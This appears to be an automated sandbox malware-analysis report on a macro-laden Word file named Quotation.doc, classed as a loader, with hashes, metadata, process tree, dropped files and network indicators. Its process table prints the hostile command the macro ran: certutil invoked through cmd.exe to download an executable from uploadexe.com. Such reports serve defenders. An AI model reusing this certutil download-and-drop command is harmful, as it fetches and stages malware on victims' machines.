analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Quotation.doc

Full analysis: https://app.any.run/tasks/d6b4032c-0788-44d9-b5bd-c8ae10ccab58
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: December 18, 2018, 19:54:12
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: Windows User, Template: Normal, Last Saved By: Windows User, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Total Editing Time: 02:00, Create Time/Date: Mon Dec 17 22:19:00 2018, Last Saved Time/Date: Mon Dec 17 22:21:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 0, Security: 0
MD5:

D89F0D3054350561422C383E09105645

SHA1:

B221C6764793FF6457B85F4D4BA8E14CF600EC95

SHA256:

8D0286BDF4B9D670A53E1242B0498B8D92DADE3D2101A116A3095923785FFF5E

SSDEEP:

384:OgyGcS2r37rKr2tLKzPd0jGK10ALj9Q86tz:UrnM2tL4VfW0AL28s

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2840)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3804)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2840)
  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • certutil.exe (PID: 2176)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2840)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2840)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

Author: Windows User
Template: Normal
LastModifiedBy: Windows User
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: 2.0 minutes
CreateDate: 2018:12:17 22:19:00
ModifyDate: 2018:12:17 22:21:00
Pages: 1
Words: -
Characters: -
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: -
AppVersion: 12
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 39
CompObjUserType: Microsoft Office Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
32
Monitored processes
3
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
2840"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Quotation.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3804"C:\Windows\System32\cmd.exe" /c certutil -urlcache -split -f https://uploadexe.com/uploads/5c17a331424c5givemejoy_outputB29F4EF.exe C:\Users\admin\AppData\Local\Temp\path.exeC:\Windows\System32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
2147954402
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2176certutil -urlcache -split -f https://uploadexe.com/uploads/5c17a331424c5givemejoy_outputB29F4EF.exeC:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147954402
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
616
Read events
568
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
0
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR88CD.tmp.cvr
MD5:
SHA256:
2840WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$otation.docpgc
MD5:3A58602DEA8CC97419FA58E1CA1D0CAF
SHA256:D15004A45E8C800D1E3C1BA95756688AD73D7C13BE6D24CB8174DC019C78C0AC
2176certutil.exeC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RB73MZ6Y\5c17a331424c5givemejoy_outputB29F4EF[1].exeexecutable
MD5:254EBCBD05E8392EB889749FD4318DBE
SHA256:C34A43609D9D5E70DD5E5DCDAA0AE67CBB996923FAF81A54D3296C3D8E5935D8
2840WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:223C04EE61ED8F02BCF356FC5203A117
SHA256:C996176EFEE81BE81BBED062D8AD643F33D360DEC10E717577235A9D29F2EF09
2176certutil.exeC:\Users\admin\AppData\Local\Temp\5c17a331424c5givemejoy_outputB29F4EF.exeexecutable
MD5:254EBCBD05E8392EB889749FD4318DBE
SHA256:C34A43609D9D5E70DD5E5DCDAA0AE67CBB996923FAF81A54D3296C3D8E5935D8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2176
certutil.exe
212.227.172.253:443
uploadexe.com
1&1 Internet SE
DE
unknown

DNS requests

Domain
IP
Reputation
uploadexe.com
  • 212.227.172.253
unknown

Threats

No threats detected
No debug info